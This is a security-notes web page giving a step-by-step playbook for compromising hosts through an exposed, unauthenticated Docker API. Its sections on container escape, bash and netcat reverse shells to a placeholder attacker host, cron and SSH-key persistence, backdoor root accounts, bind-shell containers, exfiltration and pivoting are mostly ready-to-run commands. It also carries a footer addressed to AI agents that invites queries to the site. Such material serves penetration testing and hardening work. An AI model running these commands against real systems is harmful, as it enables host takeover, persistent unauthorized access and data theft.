> For the complete documentation index, see [llms.txt](https://ahmed-tarek.gitbook.io/security-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ahmed-tarek.gitbook.io/security-notes/notes/attack-vectors-by-port/docker.md). # Docker **`Default Ports: 2375 (HTTP), 2376 (HTTPS)`** **Docker** is a containerization platform that allows developers to package applications and their dependencies into isolated containers. The Docker API provides remote management capabilities, enabling administration of Docker hosts over the network. When exposed without proper authentication, it can lead to complete host compromise. ### Connect #### Using Docker Client The Docker CLI can connect to remote Docker daemons for management and exploitation: **Set Persistent Connection (Unencrypted)** ``` export DOCKER_HOST="tcp://target.com:2375" docker ps ``` **Set Persistent Connection with TLS** ``` export DOCKER_HOST="tcp://target.com:2376" export DOCKER_TLS_VERIFY=1 docker --tlsverify ps ``` **Execute One-Time Commands** ``` # Unencrypted docker -H tcp://target.com:2375 ps # With TLS docker -H tcp://target.com:2376 --tlsverify ps ``` #### Using cURL cURL allows direct interaction with the Docker REST API for enumeration and exploitation: **Get Docker Version Information** ``` curl http://target.com:2375/version ``` **List All Containers** ``` curl http://target.com:2375/containers/json ``` **List Available Images** ``` curl http://target.com:2375/images/json ``` **Retrieve System Information** ``` curl http://target.com:2375/info ``` #### Using Docker API Directly ``` # Python example import docker client = docker.DockerClient(base_url='tcp://target.com:2375') print(client.containers.list()) print(client.images.list()) ``` ### Recon #### Service Detection with Nmap Use `Nmap` to check if the Docker API is exposed and determine if it requires authentication. **Basic Port and Version Detection** ``` nmap -p 2375,2376 -sV target.com ``` **Docker Information Scripts** ``` nmap -p 2375 --script docker-version,docker-info target.com ``` #### Banner Grabbing Identify the Docker version and gather initial information about the Docker daemon using various tools. **Using Netcat** ``` nc -vn target.com 2375 ``` **Using cURL for Version Information** ``` curl -s http://target.com:2375/version ``` **Get Detailed Information with JSON Parsing** ``` curl -s http://target.com:2375/version | jq . curl -s http://target.com:2375/info | jq . ``` #### Check Authentication Determine if the Docker API requires authentication and test different connection methods. **Test Unencrypted Authentication** ``` curl -s http://target.com:2375/containers/json # If returns container list: No authentication # If returns error: Authentication required # If connection refused: Service not exposed or firewall ``` **Test TLS Connection** ``` openssl s_client -connect target.com:2376 ``` ### Enumeration #### Container Enumeration Listing containers reveals running applications, their configurations, and potential attack targets. **List Running Containers** ``` docker -H tcp://target.com:2375 ps ``` **List All Containers** ``` docker -H tcp://target.com:2375 ps -a ``` **Get Container Details** ``` docker -H tcp://target.com:2375 inspect ``` **Using API Directly** ``` curl http://target.com:2375/containers/json?all=1 ``` **Check Container Processes** ``` docker -H tcp://target.com:2375 top ``` #### Image Enumeration Docker images can contain sensitive information, credentials, and application secrets. **List Available Images** ``` docker -H tcp://target.com:2375 images ``` **Get Image Details** ``` docker -H tcp://target.com:2375 inspect ``` **View Image History** ``` docker -H tcp://target.com:2375 history ``` **Using API for Images** ``` curl http://target.com:2375/images/json ``` #### Network Enumeration Discover Docker networks and their configurations to understand container communication. **List Docker Networks** ``` docker -H tcp://target.com:2375 network ls ``` **Inspect Network Details** ``` docker -H tcp://target.com:2375 network inspect bridge ``` **Using API for Networks** ``` curl http://target.com:2375/networks ``` #### Volume Enumeration Identify Docker volumes that may contain persistent data or sensitive information. **List Docker Volumes** ``` docker -H tcp://target.com:2375 volume ls ``` **Inspect Volume Details** ``` docker -H tcp://target.com:2375 volume inspect ``` **Using API for Volumes** ``` curl http://target.com:2375/volumes ``` #### System Information Gather comprehensive information about the Docker daemon and host system. **Get Docker Information** ``` docker -H tcp://target.com:2375 info ``` **Get Docker Version** ``` docker -H tcp://target.com:2375 version ``` **Check Disk Usage** ``` docker -H tcp://target.com:2375 system df ``` **Using API for System Info** ``` curl http://target.com:2375/info | jq . curl http://target.com:2375/version | jq . ``` ### Attack Vectors #### Container Escape via Privileged Container Privileged containers bypass security restrictions and allow direct access to the host system. This is one of the most effective methods for escaping container isolation and gaining root access to the underlying host. **Creating Privileged Container** ``` docker -H tcp://target.com:2375 run -it --privileged \ --pid=host --net=host --ipc=host \ -v /:/host ubuntu /bin/bash ``` **Accessing Host System** ``` # Inside container, access host filesystem chroot /host /bin/bash # Now you have root on the host system whoami # root cat /etc/shadow ``` #### Container Escape via Volume Mount Volume mounting allows containers to access host filesystems, potentially leading to host compromise when sensitive directories are mounted. **Mount Host Root Filesystem** ``` docker -H tcp://target.com:2375 run -it \ -v /:/hostfs ubuntu /bin/bash ``` **Access Host Files** ``` cd /hostfs cat /hostfs/etc/shadow ``` **Establish Persistence** ``` # Write SSH key for persistence mkdir -p /hostfs/root/.ssh echo "ssh-rsa AAAA..." > /hostfs/root/.ssh/authorized_keys chmod 600 /hostfs/root/.ssh/authorized_keys ``` #### Reverse Shell via New Container Create new containers with reverse shell capabilities to establish remote access to the Docker host. **Create Container with Bash Reverse Shell** ``` docker -H tcp://target.com:2375 run -d \ ubuntu /bin/bash -c \ "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" ``` **Create Container with Netcat Reverse Shell** ``` docker -H tcp://target.com:2375 run -d \ ubuntu nc attacker-ip 4444 -e /bin/bash ``` **Mount Host and Execute Reverse Shell** ``` docker -H tcp://target.com:2375 run -d \ -v /:/hostfs ubuntu \ /bin/bash -c "chroot /hostfs bash -i >& /dev/tcp/attacker-ip/4444 0>&1" ``` #### Execute Commands in Existing Container Execute commands within running containers to gain access and perform reconnaissance. **Execute Single Command** ``` docker -H tcp://target.com:2375 exec whoami ``` **Get Interactive Shell** ``` docker -H tcp://target.com:2375 exec -it /bin/bash ``` **Execute as Root** ``` docker -H tcp://target.com:2375 exec -u root -it /bin/bash ``` **Using API for Command Execution** ``` curl -X POST -H "Content-Type: application/json" \ http://target.com:2375/containers//exec \ -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Cmd":["/bin/bash"],"DetachKeys":"ctrl-p,ctrl-q","Privileged":false,"Tty":true}' ``` #### Image Backdooring Create malicious Docker images with backdoors to establish persistent access or compromise other systems. **Pull Legitimate Image** ``` docker -H tcp://target.com:2375 pull ubuntu ``` **Create Malicious Dockerfile** ``` cat > Dockerfile < backdoor.tar curl -X POST -H "Content-Type: application/x-tar" \ --data-binary @backdoor.tar \ http://target.com:2375/images/load ``` #### Docker Socket Abuse Exploit containers that have the Docker socket mounted, allowing control of the Docker daemon from within a container. **Check for Docker Socket** ``` ls -la /var/run/docker.sock ``` **Control Docker from Container** ``` docker -H unix:///var/run/docker.sock ps ``` **Escape to Host** ``` docker -H unix:///var/run/docker.sock run -it \ -v /:/hostfs ubuntu chroot /hostfs /bin/bash ``` #### Secrets Extraction Extract sensitive information including secrets, credentials, and configuration data from Docker containers and images. **List Docker Swarm Secrets** ``` docker -H tcp://target.com:2375 secret ls ``` **Inspect Secret Details** ``` docker -H tcp://target.com:2375 secret inspect ``` **Search for Sensitive Files** ``` docker -H tcp://target.com:2375 exec \ find / -name "*.key" -o -name "*credential*" -o -name "*.pem" 2>/dev/null ``` **Check Environment Variables** ``` docker -H tcp://target.com:2375 exec env ``` **Inspect Container Configuration** ``` docker -H tcp://target.com:2375 inspect | grep -i "env\|secret\|password" ``` ### Post-Exploitation #### Host Takeover Gain complete control over the Docker host system through various persistence and privilege escalation methods. **Create Privileged Container** ``` docker -H tcp://target.com:2375 run -it --rm --privileged \ --pid=host --net=host -v /:/host alpine \ chroot /host /bin/bash ``` **Establish Cron Job Persistence** ``` docker -H tcp://target.com:2375 run -v /etc:/hostfs/etc alpine \ sh -c 'echo "* * * * * root bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> /hostfs/etc/crontab' ``` **Add SSH Key for Access** ``` docker -H tcp://target.com:2375 run -v /root:/hostfs/root alpine \ sh -c 'mkdir -p /hostfs/root/.ssh && echo "ssh-rsa AAAA..." >> /hostfs/root/.ssh/authorized_keys' ``` **Create Backdoor User** ``` docker -H tcp://target.com:2375 run -v /etc:/hostfs/etc alpine \ sh -c 'echo "backdoor:x:0:0::/root:/bin/bash" >> /hostfs/etc/passwd && echo "backdoor:password_hash" >> /hostfs/etc/shadow' ``` #### Container Persistence Create persistent backdoor containers that maintain access even after system restarts. **Create Persistent Backdoor Container** ``` docker -H tcp://target.com:2375 run -d --name backdoor \ --restart always \ -p 4444:4444 \ ubuntu nc -lvp 4444 -e /bin/bash ``` **Verify Container Status** ``` docker -H tcp://target.com:2375 ps | grep backdoor ``` #### Data Exfiltration Extract sensitive data from containers and host systems for analysis or exfiltration. **Copy Files from Container** ``` docker -H tcp://target.com:2375 cp :/etc/passwd /tmp/passwd ``` **Export Container Filesystem** ``` docker -H tcp://target.com:2375 export > container.tar tar -xf container.tar ``` **Backup Host Data** ``` docker -H tcp://target.com:2375 run -v /:/hostfs alpine \ tar czf /tmp/backup.tar.gz /hostfs/etc /hostfs/root /hostfs/home ``` **Download Archive** ``` docker -H tcp://target.com:2375 cp :/tmp/backup.tar.gz . ``` #### Registry Access Access private Docker registries to extract images and search for sensitive information. **Pull Images from Private Registry** ``` docker -H tcp://target.com:2375 pull registry.company.com/app:latest ``` **Extract Image Contents** ``` docker -H tcp://target.com:2375 save registry.company.com/app:latest > app.tar tar -xf app.tar ``` **Search for Credentials** ``` grep -r "password\|secret\|key" . ``` #### Network Pivoting Use Docker containers to pivot into internal networks and access additional systems. **Create Host Network Container** ``` docker -H tcp://target.com:2375 run -it --net=host \ alpine /bin/sh ``` **Install Network Tools** ``` apk add nmap ``` **Scan Internal Networks** ``` nmap -sn 192.168.0.0/24 nmap -p- 192.168.0.100 ``` **Setup SOCKS Proxy** ``` docker -H tcp://target.com:2375 run -d \ -p 1080:1080 \ serjs/go-socks5-proxy ``` **Use Proxy for Pivoting** ``` # Edit /etc/proxychains.conf # socks5 target.com 1080 proxychains nmap -sT 192.168.0.0/24 ``` #### Container Modification Modify existing containers and images to create persistent backdoors or extract sensitive information. **Commit Container as New Image** ``` docker -H tcp://target.com:2375 commit backdoored:latest ``` **Export and Analyze Image** ``` docker -H tcp://target.com:2375 save backdoored:latest > backdoored.tar ``` **Modify Image Layers** ``` # Extract tar tar -xf backdoored.tar # Modify layer contents # Repackage tar -cf modified.tar * # Load back docker -H tcp://target.com:2375 load < modified.tar ``` ### Common Docker Commands | Command | Description | Usage | | ---------------- | ------------------------ | ----------------------------------------------------- | | `docker ps` | List running containers | `docker -H tcp://target:2375 ps` | | `docker ps -a` | List all containers | `docker -H tcp://target:2375 ps -a` | | `docker images` | List images | `docker -H tcp://target:2375 images` | | `docker exec` | Execute in container | `docker -H tcp://target:2375 exec -it /bin/bash` | | `docker run` | Create and run container | `docker -H tcp://target:2375 run -it ubuntu` | | `docker inspect` | Get details | `docker -H tcp://target:2375 inspect ` | | `docker logs` | View logs | `docker -H tcp://target:2375 logs ` | | `docker cp` | Copy files | `docker -H tcp://target:2375 cp :/file .` | ### Docker API Endpoints | Endpoint | Method | Description | | ------------------------ | ------ | ---------------------- | | `/version` | GET | Get Docker version | | `/info` | GET | Get system information | | `/containers/json` | GET | List containers | | `/containers/create` | POST | Create container | | `/containers//start` | POST | Start container | | `/containers//exec` | POST | Execute command | | `/images/json` | GET | List images | | `/images/create` | POST | Pull/create image | | `/networks` | GET | List networks | | `/volumes` | GET | List volumes | ### Useful Tools | Tool | Description | Primary Use Case | | --------------- | ---------------------- | ------------------------ | | Docker CLI | Official Docker client | Container management | | docker-py | Python Docker library | Automation and scripting | | docker-compose | Multi-container tool | Orchestration | | docker-bench | Security audit tool | Configuration assessment | | dive | Image layer explorer | Image analysis | | trivy | Vulnerability scanner | Image security scanning | | docker-explorer | Forensics tool | Container investigation | ### Security Misconfigurations to Test * ❌ Docker API exposed without authentication * ❌ Using unencrypted port 2375 * ❌ Privileged containers running * ❌ Host filesystem mounted in containers * ❌ Docker socket mounted in containers * ❌ Containers running as root * ❌ No resource limits on containers * ❌ Exposed internal ports * ❌ Using `:latest` tag for production * ❌ No vulnerability scanning on images * ❌ Secrets stored in images or environment variables * ❌ No network segmentation between containers ### Container Escape Checks ``` # Check if running in container ls -la /.dockerenv cat /proc/1/cgroup | grep docker # Check for privileged mode ip link add dummy0 type dummy 2>/dev/null && echo "Privileged" || echo "Not Privileged" # Check capabilities capsh --print # Check mounted filesystems mount | grep -i docker # Check for Docker socket ls -la /var/run/docker.sock # Check for host proc ls -la /proc/sys/kernel # Check kernel version vs host uname -r ```
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ahmed-tarek.gitbook.io/security-notes/notes/attack-vectors-by-port/docker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.